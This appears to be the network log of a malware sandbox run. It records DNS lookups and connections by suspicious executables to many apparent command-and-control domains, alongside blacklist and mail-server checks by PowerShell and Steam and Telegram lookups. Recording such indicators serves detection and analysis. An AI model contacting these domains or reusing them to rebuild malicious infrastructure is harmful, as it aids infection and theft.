• 8.8.8.8:53  www.google.com  dns  powershell.exe  60 B sent / 76 B recv  1 pkt sent / 1 pkt recv
  DNS Request: www.google.com
  DNS Response: 142.250.200.4

• 8.8.8.8:53  ogads-pa.googleapis.com  dns  chrome.exe  69 B sent / 293 B recv  1 pkt sent / 1 pkt recv
  DNS Request: ogads-pa.googleapis.com
  DNS Response: 142.250.178.10, 172.217.169.42, 142.250.200.42, 142.250.187.202, 216.58.201.106, 172.217.16.234, 216.58.204.74, 216.58.213.10, 142.250.200.10, 216.58.212.202, 142.250.179.234, 142.250.187.234, 172.217.169.10, 142.250.180.10

• 142.250.178.10:443  ogads-pa.googleapis.com  https  chrome.exe  2.7kB sent / 7.3kB recv  11 pkts sent / 14 pkts recv

• 8.8.8.8:53  fivenn5sr.top  dns  90ced29b15.exe  164 B sent / 216 B recv  2 pkts sent / 2 pkts recv
  DNS Request: fivenn5sr.top
  DNS Request: fivenn5sr.top
  DNS Response: 185.72.145.179

• 8.8.8.8:53  play.google.com  dns  firefox.exe  61 B sent / 77 B recv  1 pkt sent / 1 pkt recv
  DNS Request: play.google.com
  DNS Response: 142.250.178.14

• 142.250.178.14:443  play.google.com  https  chrome.exe  3.4kB sent / 7.1kB recv  10 pkts sent / 11 pkts recv

• 142.250.178.14:443  play.google.com  https  chrome.exe  2.7kB sent / 7.6kB recv  7 pkts sent / 11 pkts recv

• 8.8.8.8:53  wildpadventures.tech  dns  9aiiMOQ.exe  66 B sent / 131 B recv  1 pkt sent / 1 pkt recv
  DNS Request: wildpadventures.tech
  (no DNS Response recorded)

• 8.8.8.8:53  microsoft.com  dns  powershell.exe  59 B sent / 139 B recv  1 pkt sent / 1 pkt recv
  DNS Request: microsoft.com
  DNS Response: 20.112.250.133, 20.231.239.246, 20.70.246.20, 20.236.44.162, 20.76.201.171

• 224.0.0.251:5353  (mDNS multicast; no domain, protocol or process recorded)  608 B  9 pkts  (receive counters absent)

• 8.8.8.8:53  microsoft.com  dns  powershell.exe  59 B sent / 113 B recv  1 pkt sent / 1 pkt recv
  DNS Request: microsoft.com
  (no DNS Response recorded)

• 8.8.8.8:53  microsoft-com.mail.protection.outlook.com  dns  powershell.exe  87 B sent / 151 B recv  1 pkt sent / 1 pkt recv
  DNS Request: microsoft-com.mail.protection.outlook.com
  DNS Response: 52.101.8.49, 52.101.42.0, 52.101.40.26, 52.101.11.0

• 8.8.8.8:53  rebeldettern.com  dns  c6a31d1295.exe  62 B sent / 135 B recv  1 pkt sent / 1 pkt recv
  DNS Request: rebeldettern.com
  (no DNS Response recorded)

• 8.8.8.8:53  importenptoc.com  dns  c6a31d1295.exe  62 B sent / 135 B recv  1 pkt sent / 1 pkt recv
  DNS Request: importenptoc.com
  (no DNS Response recorded)

• 8.8.8.8:53  voicesharped.com  dns  c6a31d1295.exe  62 B sent / 135 B recv  1 pkt sent / 1 pkt recv
  DNS Request: voicesharped.com
  (no DNS Response recorded)

• 8.8.8.8:53  inputrreparnt.com  dns  c6a31d1295.exe  63 B sent / 136 B recv  1 pkt sent / 1 pkt recv
  DNS Request: inputrreparnt.com
  (no DNS Response recorded)

                                                                                            • 8.8.8.8:53
                                                                                              torpdidebar.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              61 B
                                                                                              134 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              torpdidebar.com

                                                                                            • 8.8.8.8:53
                                                                                              actiothreaz.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              61 B
                                                                                              134 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              actiothreaz.com

                                                                                            • 8.8.8.8:53
                                                                                              garulouscuto.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              62 B
                                                                                              135 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              garulouscuto.com

                                                                                            • 8.8.8.8:53
                                                                                              breedertremnd.com
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              63 B
                                                                                              136 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              breedertremnd.com

                                                                                            • 8.8.8.8:53
                                                                                              steamcommunity.com
                                                                                              dns
                                                                                              BitLockerToGo.exe
                                                                                              64 B
                                                                                              80 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              steamcommunity.com

                                                                                              DNS Response

                                                                                              104.82.234.109

                                                                                            • 8.8.8.8:53
                                                                                              bloodyeleftor.world
                                                                                              dns
                                                                                              c6a31d1295.exe
                                                                                              65 B
                                                                                              97 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              bloodyeleftor.world

                                                                                              DNS Response

                                                                                              104.21.63.231
                                                                                              172.67.172.150

                                                                                            • 8.8.8.8:53
                                                                                              vanaheim.cn
                                                                                              dns
                                                                                              powershell.exe
                                                                                              57 B
                                                                                              73 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              vanaheim.cn

                                                                                              DNS Response

                                                                                              2.59.161.190

                                                                                            • 8.8.8.8:53
                                                                                              147.63.102.212.dnsbl.sorbs.net
                                                                                              dns
                                                                                              powershell.exe
                                                                                              76 B
                                                                                              126 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              147.63.102.212.dnsbl.sorbs.net

                                                                                            • 8.8.8.8:53
                                                                                              147.63.102.212.bl.spamcop.net
                                                                                              dns
                                                                                              powershell.exe
                                                                                              75 B
                                                                                              128 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              147.63.102.212.bl.spamcop.net

                                                                                            • 8.8.8.8:53
                                                                                              147.63.102.212.zen.spamhaus.org
                                                                                              dns
                                                                                              powershell.exe
                                                                                              77 B
                                                                                              141 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              147.63.102.212.zen.spamhaus.org

                                                                                            • 8.8.8.8:53
                                                                                              147.63.102.212.sbl-xbl.spamhaus.org
                                                                                              dns
                                                                                              powershell.exe
                                                                                              81 B
                                                                                              145 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              147.63.102.212.sbl-xbl.spamhaus.org

                                                                                            • 8.8.8.8:53
                                                                                              147.63.102.212.cbl.abuseat.org
                                                                                              dns
                                                                                              powershell.exe
                                                                                              76 B
                                                                                              149 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              147.63.102.212.cbl.abuseat.org

                                                                                            • 8.8.8.8:53
                                                                                              impactsupport.world
                                                                                              dns
                                                                                              6ccbdd7074.exe
                                                                                              65 B
                                                                                              133 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              impactsupport.world

                                                                                            • 142.250.178.10:443
                                                                                              ogads-pa.googleapis.com
                                                                                              https
                                                                                              chrome.exe
                                                                                              4.0kB
                                                                                              7.4kB
                                                                                              12
                                                                                              14
                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              https
                                                                                              chrome.exe
                                                                                              3.5kB
                                                                                              7.1kB
                                                                                              10
                                                                                              11
                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              https
                                                                                              chrome.exe
                                                                                              2.8kB
                                                                                              7.6kB
                                                                                              8
                                                                                              12
                                                                                            • 8.8.8.8:53
                                                                                              yahoo.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              55 B
                                                                                              134 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              yahoo.com

                                                                                            • 8.8.8.8:53
                                                                                              mta6.am0.yahoodns.net
                                                                                              dns
                                                                                              powershell.exe
                                                                                              67 B
                                                                                              195 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              mta6.am0.yahoodns.net

                                                                                              DNS Response

                                                                                              67.195.204.73
                                                                                              67.195.228.110
                                                                                              67.195.204.74
                                                                                              98.136.96.91
                                                                                              67.195.228.94
                                                                                              67.195.204.79
                                                                                              67.195.228.106
                                                                                              98.136.96.77

                                                                                            • 8.8.8.8:53
                                                                                              youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              57 B
                                                                                              73 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              youtube.com

                                                                                              DNS Response

                                                                                              142.250.179.238

                                                                                            • 8.8.8.8:53
                                                                                              spocs.getpocket.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                              131 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              spocs.getpocket.com

                                                                                              DNS Response

                                                                                              34.117.188.166

                                                                                            • 8.8.8.8:53
                                                                                              youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              57 B
                                                                                              73 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              youtube.com

                                                                                              DNS Response

                                                                                              142.250.179.238

                                                                                            • 8.8.8.8:53
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              82 B
                                                                                              98 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.ads.prod.webservices.mozgcp.net

                                                                                              DNS Response

                                                                                              34.117.188.166

                                                                                            • 8.8.8.8:53
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              103 B
                                                                                              119 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net

                                                                                              DNS Response

                                                                                              34.160.144.191

                                                                                            • 8.8.8.8:53
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              103 B
                                                                                              131 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net

                                                                                              DNS Response

                                                                                              2600:1901:0:92a9::

                                                                                            • 8.8.8.8:53
                                                                                              youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              57 B
                                                                                              85 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              youtube.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:81d::200e

                                                                                            • 8.8.8.8:53
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              82 B
                                                                                              175 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.ads.prod.webservices.mozgcp.net

                                                                                            • 8.8.8.8:53
                                                                                              shavar.prod.mozaws.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              68 B
                                                                                              116 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              shavar.prod.mozaws.net

                                                                                              DNS Response

                                                                                              34.209.7.244
                                                                                              52.24.11.115
                                                                                              34.208.172.229

                                                                                            • 8.8.8.8:53
                                                                                              shavar.prod.mozaws.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              68 B
                                                                                              153 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              shavar.prod.mozaws.net

                                                                                            • 8.8.8.8:53
                                                                                              prod.remote-settings.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              94 B
                                                                                              110 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.remote-settings.prod.webservices.mozgcp.net

                                                                                              DNS Response

                                                                                              34.149.100.209

                                                                                            • 8.8.8.8:53
                                                                                              prod.remote-settings.prod.webservices.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              94 B
                                                                                              122 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              prod.remote-settings.prod.webservices.mozgcp.net

                                                                                              DNS Response

                                                                                              2600:1901:0:c47c::

                                                                                            • 142.250.179.238:443
                                                                                              youtube.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              1.8kB
                                                                                              9.3kB
                                                                                              6
                                                                                              10
                                                                                            • 8.8.8.8:53
                                                                                              www.youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              61 B
                                                                                              319 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              www.youtube.com

                                                                                              DNS Response

                                                                                              216.58.213.14
                                                                                              216.58.212.238
                                                                                              142.250.187.238
                                                                                              216.58.201.110
                                                                                              172.217.169.46
                                                                                              142.250.200.46
                                                                                              216.58.204.78
                                                                                              142.250.179.238
                                                                                              142.250.200.14
                                                                                              142.250.180.14
                                                                                              172.217.169.14
                                                                                              142.250.178.14
                                                                                              172.217.16.238
                                                                                              142.250.187.206

                                                                                            • 8.8.8.8:53
                                                                                              youtube-ui.l.google.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              69 B
                                                                                              293 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              youtube-ui.l.google.com

                                                                                              DNS Response

                                                                                              216.58.201.110
                                                                                              216.58.213.14
                                                                                              142.250.187.206
                                                                                              172.217.16.238
                                                                                              142.250.178.14
                                                                                              172.217.169.14
                                                                                              216.58.204.78
                                                                                              142.250.179.238
                                                                                              142.250.200.46
                                                                                              142.250.187.238
                                                                                              216.58.212.238
                                                                                              172.217.169.46
                                                                                              142.250.200.14
                                                                                              142.250.180.14

                                                                                            • 8.8.8.8:53
                                                                                              youtube-ui.l.google.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              69 B
                                                                                              181 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              youtube-ui.l.google.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:81e::200e
                                                                                              2a00:1450:4009:820::200e
                                                                                              2a00:1450:4009:81f::200e
                                                                                              2a00:1450:4009:81d::200e

                                                                                            • 216.58.213.14:443
                                                                                              youtube-ui.l.google.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              2.3kB
                                                                                              9.4kB
                                                                                              11
                                                                                              11
                                                                                            • 8.8.8.8:53
                                                                                              consent.youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                              81 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              consent.youtube.com

                                                                                              DNS Response

                                                                                              216.58.201.110

                                                                                            • 8.8.8.8:53
                                                                                              firefox-api-proxy.cdn.mozilla.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              79 B
                                                                                              160 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              firefox-api-proxy.cdn.mozilla.net

                                                                                              DNS Response

                                                                                              34.149.97.1

                                                                                            • 34.149.97.1:443
                                                                                              firefox-api-proxy.cdn.mozilla.net
                                                                                              https
                                                                                              firefox.exe
                                                                                              2.2kB
                                                                                              13.2kB
                                                                                              8
                                                                                              14
                                                                                            • 8.8.8.8:53
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              100 B
                                                                                              116 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                                                                                              DNS Response

                                                                                              34.149.97.1

                                                                                            • 8.8.8.8:53
                                                                                              consent.youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                              81 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              consent.youtube.com

                                                                                              DNS Response

                                                                                              216.58.201.110

                                                                                            • 8.8.8.8:53
                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              100 B
                                                                                              128 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                                                                                              DNS Response

                                                                                              2600:1901:0:74e4::

                                                                                            • 8.8.8.8:53
                                                                                              consent.youtube.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                              93 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              consent.youtube.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:826::200e

                                                                                            • 216.58.201.110:443
                                                                                              consent.youtube.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              2.6kB
                                                                                              10.3kB
                                                                                              9
                                                                                              13
                                                                                            • 8.8.8.8:53
                                                                                              www.google.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              60 B
                                                                                              76 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              www.google.com

                                                                                              DNS Response

                                                                                              142.250.200.4

                                                                                            • 8.8.8.8:53
                                                                                              www.google.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              60 B
                                                                                              88 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              www.google.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:822::2004

                                                                                            • 142.250.200.4:443
                                                                                              www.google.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              1.9kB
                                                                                              9.3kB
                                                                                              7
                                                                                              10
                                                                                            • 8.8.8.8:53
                                                                                              github.com
                                                                                              dns
                                                                                              futors.exe
                                                                                              56 B
                                                                                              72 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              github.com

                                                                                              DNS Response

                                                                                              20.26.156.215

                                                                                            • 8.8.8.8:53
                                                                                              i.instagram.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              61 B
                                                                                              106 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              i.instagram.com

                                                                                              DNS Response

                                                                                              163.70.151.63

                                                                                            • 8.8.8.8:53
                                                                                              objects.githubusercontent.com
                                                                                              dns
                                                                                              futors.exe
                                                                                              75 B
                                                                                              139 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              objects.githubusercontent.com

                                                                                              DNS Response

                                                                                              185.199.108.133
                                                                                              185.199.110.133
                                                                                              185.199.111.133
                                                                                              185.199.109.133

Fields per entry: destination, domain, protocol, process, bytes sent / received, packets sent / received; for dns entries the request is the domain shown, and any resolved addresses the report recorded follow as "response".

• 8.8.8.8:53  nw-umwatson.events.data.microsoft.com  dns  msedge.exe  83 B / 211 B  1 / 1  response: 20.42.73.29
• 8.8.8.8:53  api.telegram.org  dns  trano1221.exe  62 B / 78 B  1 / 1  response: 149.154.167.220
• 8.8.8.8:53  elviscomputer.hu  dns  powershell.exe  62 B / 78 B  1 / 1  response: 195.228.152.90
• 8.8.8.8:53  i.instagram.com  dns  powershell.exe  61 B / 106 B  1 / 1  response: 163.70.151.63
• 8.8.8.8:53  breakfasutwy.cyou  dns  c6a31d1295.exe  63 B / 128 B  1 / 1  response: none recorded
• 8.8.8.8:53  importenptoc.com  dns  c6a31d1295.exe  62 B / 135 B  1 / 1  response: none recorded
• 8.8.8.8:53  voicesharped.com  dns  c6a31d1295.exe  62 B / 135 B  1 / 1  response: none recorded
• 8.8.8.8:53  inputrreparnt.com  dns  c6a31d1295.exe  63 B / 136 B  1 / 1  response: none recorded
• 8.8.8.8:53  torpdidebar.com  dns  c6a31d1295.exe  61 B / 134 B  1 / 1  response: none recorded
• 8.8.8.8:53  rebeldettern.com  dns  c6a31d1295.exe  62 B / 135 B  1 / 1  response: none recorded
• 8.8.8.8:53  actiothreaz.com  dns  c6a31d1295.exe  61 B / 134 B  1 / 1  response: none recorded
• 8.8.8.8:53  garulouscuto.com  dns  c6a31d1295.exe  62 B / 135 B  1 / 1  response: none recorded
• 8.8.8.8:53  breedertremnd.com  dns  c6a31d1295.exe  63 B / 136 B  1 / 1  response: none recorded
• 8.8.8.8:53  steamcommunity.com  dns  BitLockerToGo.exe  64 B / 80 B  1 / 1  response: 104.82.234.109
• 8.8.8.8:53  nestlecompany.pro  dns  con12312211221.exe  63 B / 145 B  1 / 1  response: none recorded
• 8.8.8.8:53  shiningrstars.help  dns  alex12112.exe  64 B / 129 B  1 / 1  response: none recorded
• 8.8.8.8:53  mercharena.biz  dns  alex12112.exe  60 B / 122 B  1 / 1  response: none recorded
• 8.8.8.8:53  t.me  dns  powershell.exe  50 B / 66 B  1 / 1  response: 149.154.167.99
• 8.8.8.8:53  generalmills.pro  dns  alex12112.exe  62 B / 144 B  1 / 1  response: none recorded
• 8.8.8.8:53  google.com  dns  powershell.exe  56 B / 77 B  1 / 1  response: none recorded
• 8.8.8.8:53  smtp.google.com  dns  powershell.exe  61 B / 125 B  1 / 1  response: 142.250.27.27, 142.250.102.26, 142.250.27.26, 142.250.102.27
• 8.8.8.8:53  naturewsounds.help  dns  monthdragon.exe  64 B / 129 B  1 / 1  response: none recorded
• 8.8.8.8:53  location.services.mozilla.com  dns  firefox.exe  75 B / 153 B  1 / 1  response: 35.190.72.216
• 8.8.8.8:53  prod.balrog.prod.cloudops.mozgcp.net  dns  firefox.exe  82 B / 98 B  1 / 1  response: 35.244.181.201
• 8.8.8.8:53  prod.classify-client.prod.webservices.mozgcp.net  dns  firefox.exe  94 B / 110 B  1 / 1  response: 35.190.72.216
• 35.190.72.216:443  prod.classify-client.prod.webservices.mozgcp.net  https  firefox.exe  2.5kB / 5.0kB  14 / 12
• 8.8.8.8:53  prod.balrog.prod.cloudops.mozgcp.net  dns  firefox.exe  82 B / 110 B  1 / 1  response: 2600:1901:0:5133::
• 8.8.8.8:53  prod.classify-client.prod.webservices.mozgcp.net  dns  firefox.exe  94 B / 187 B  1 / 1  response: none recorded
• 8.8.8.8:53  play.google.com  dns  firefox.exe  61 B / 77 B  1 / 1  response: 142.250.178.14
• 8.8.8.8:53  fxreshideas.tech  dns  alex12112.exe  62 B / 127 B  1 / 1  response: none recorded
• 8.8.8.8:53  play.google.com  dns  firefox.exe  61 B / 89 B  1 / 1  response: 2a00:1450:4009:815::200e

                                                                                            • 8.8.8.8:53
                                                                                              redirector.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                              81 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              redirector.gvt1.com

                                                                                              DNS Response

                                                                                              142.250.187.206

                                                                                            • 8.8.8.8:53
                                                                                              ciscobinary.openh264.org
                                                                                              dns
                                                                                              firefox.exe
                                                                                              70 B
                                                                                              286 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              ciscobinary.openh264.org

                                                                                              DNS Response

                                                                                              2.18.121.79
                                                                                              2.18.121.72

                                                                                            • 8.8.8.8:53
                                                                                              shiningrstars.help
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              64 B
                                                                                              129 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              shiningrstars.help

                                                                                            • 8.8.8.8:53
                                                                                              redirector.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                              81 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              redirector.gvt1.com

                                                                                              DNS Response

                                                                                              142.250.187.206

                                                                                            • 8.8.8.8:53
                                                                                              a19.dscg10.akamai.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              67 B
                                                                                              99 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              a19.dscg10.akamai.net

                                                                                              DNS Response

                                                                                              2.18.121.72
                                                                                              2.18.121.79

                                                                                            • 8.8.8.8:53
                                                                                              mercharena.biz
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              60 B
                                                                                              122 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              mercharena.biz

                                                                                            • 8.8.8.8:53
                                                                                              redirector.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              65 B
                                                                                              93 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              redirector.gvt1.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:81f::200e

                                                                                            • 8.8.8.8:53
                                                                                              generalmills.pro
                                                                                              dns
                                                                                              alex12112.exe
                                                                                              62 B
                                                                                              144 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              generalmills.pro

                                                                                            • 8.8.8.8:53
                                                                                              a19.dscg10.akamai.net
                                                                                              dns
                                                                                              firefox.exe
                                                                                              67 B
                                                                                              123 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              a19.dscg10.akamai.net

                                                                                              DNS Response

                                                                                              2a02:26f0:1700:f::1737:a1b9
                                                                                              2a02:26f0:1700:f::1737:a1d3

                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              2.0kB
                                                                                              9.3kB
                                                                                              9
                                                                                              10
                                                                                            • 142.250.187.206:443
                                                                                              redirector.gvt1.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              2.1kB
                                                                                              9.4kB
                                                                                              10
                                                                                              11
                                                                                            • 8.8.8.8:53
                                                                                              r2---sn-aigl6ns6.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              71 B
                                                                                              116 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              r2---sn-aigl6ns6.gvt1.com

                                                                                              DNS Response

                                                                                              74.125.105.7

                                                                                            • 8.8.8.8:53
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              69 B
                                                                                              85 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              r2.sn-aigl6ns6.gvt1.com

                                                                                              DNS Response

                                                                                              74.125.105.7

                                                                                            • 8.8.8.8:53
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              dns
                                                                                              firefox.exe
                                                                                              69 B
                                                                                              97 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              r2.sn-aigl6ns6.gvt1.com

                                                                                              DNS Response

                                                                                              2a00:1450:4009:4::7

                                                                                            • 74.125.105.7:443
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              https
                                                                                              firefox.exe
                                                                                              1.8kB
                                                                                              5.9kB
                                                                                              6
                                                                                              7
                                                                                            • 8.8.8.8:53
                                                                                              telegram.org
                                                                                              dns
                                                                                              powershell.exe
                                                                                              116 B
                                                                                              74 B
                                                                                              2
                                                                                              1

                                                                                              DNS Request

                                                                                              telegram.org

                                                                                              DNS Request

                                                                                              telegram.org

                                                                                              DNS Response

                                                                                              149.154.167.99

                                                                                            • 8.8.8.8:53
                                                                                              blastikcn.com
                                                                                              dns
                                                                                              fher.exe
                                                                                              59 B
                                                                                              91 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              blastikcn.com

                                                                                              DNS Response

                                                                                              172.67.192.178
                                                                                              104.21.60.59

                                                                                            • 8.8.8.8:53
                                                                                              byaronia.com
                                                                                              dns
                                                                                              powershell.exe
                                                                                              58 B
                                                                                              74 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              byaronia.com

                                                                                              DNS Response

                                                                                              109.232.216.168

                                                                                            • 8.8.8.8:53
                                                                                              mail.ru
                                                                                              dns
                                                                                              powershell.exe
                                                                                              53 B
                                                                                              73 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              mail.ru

                                                                                            • 8.8.8.8:53
                                                                                              mxs.mail.ru
                                                                                              dns
                                                                                              powershell.exe
                                                                                              57 B
                                                                                              89 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              mxs.mail.ru

                                                                                              DNS Response

                                                                                              94.100.180.31
                                                                                              217.69.139.150

                                                                                            • 8.8.8.8:53
                                                                                              edcatiofireeu.shop
                                                                                              dns
                                                                                              BitLockerToGo.exe
                                                                                              64 B
                                                                                              121 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              edcatiofireeu.shop

                                                                                            • 8.8.8.8:53
                                                                                              impolitewearr.biz
                                                                                              dns
                                                                                              BitLockerToGo.exe
                                                                                              63 B
                                                                                              125 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              impolitewearr.biz

                                                                                            • 8.8.8.8:53
                                                                                              toppyneedus.biz
                                                                                              dns
                                                                                              BitLockerToGo.exe
                                                                                              61 B
                                                                                              123 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              toppyneedus.biz

                                                                                            • 8.8.8.8:53
                                                                                              lightdeerysua.biz
                                                                                              dns
                                                                                              BitLockerToGo.exe
                                                                                              63 B
                                                                                              125 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              lightdeerysua.biz

                                                                                            • 8.8.8.8:53
                                                                                              suggestyuoz.biz
                                                                                              dns
                                                                                              BitLockerToGo.exe
                                                                                              61 B
                                                                                              123 B
(row continues from above)  … | 1 | 1
    DNS Request: suggestyuoz.biz

Destination | Domain | Proto | Process | Sent | Received | Sent pkts | Recv pkts
8.8.8.8:53 | hoursuhouy.biz | dns | BitLockerToGo.exe | 60 B | 122 B | 1 | 1
    DNS Request: hoursuhouy.biz
8.8.8.8:53 | mixedrecipew.biz | dns | BitLockerToGo.exe | 62 B | 124 B | 1 | 1
    DNS Request: mixedrecipew.biz
8.8.8.8:53 | affordtempyo.biz | dns | BitLockerToGo.exe | 62 B | 124 B | 1 | 1
    DNS Request: affordtempyo.biz
8.8.8.8:53 | pleasedcfrown.biz | dns | BitLockerToGo.exe | 63 B | 125 B | 1 | 1
    DNS Request: pleasedcfrown.biz
8.8.8.8:53 | steamcommunity.com | dns | BitLockerToGo.exe | 128 B | 80 B | 2 | 1
    DNS Request: steamcommunity.com
    DNS Request: steamcommunity.com
    DNS Response: 104.82.234.109

Every lookup in this table is attributed to BitLockerToGo.exe, a legitimate Windows binary, not to the submitted sample. The four .biz names each drew a single 122 to 125 B reply and have no DNS Response entry, i.e. no address came back (consistent with NXDOMAIN); only steamcommunity.com resolved, two queries getting one 80 B answer of 104.82.234.109.

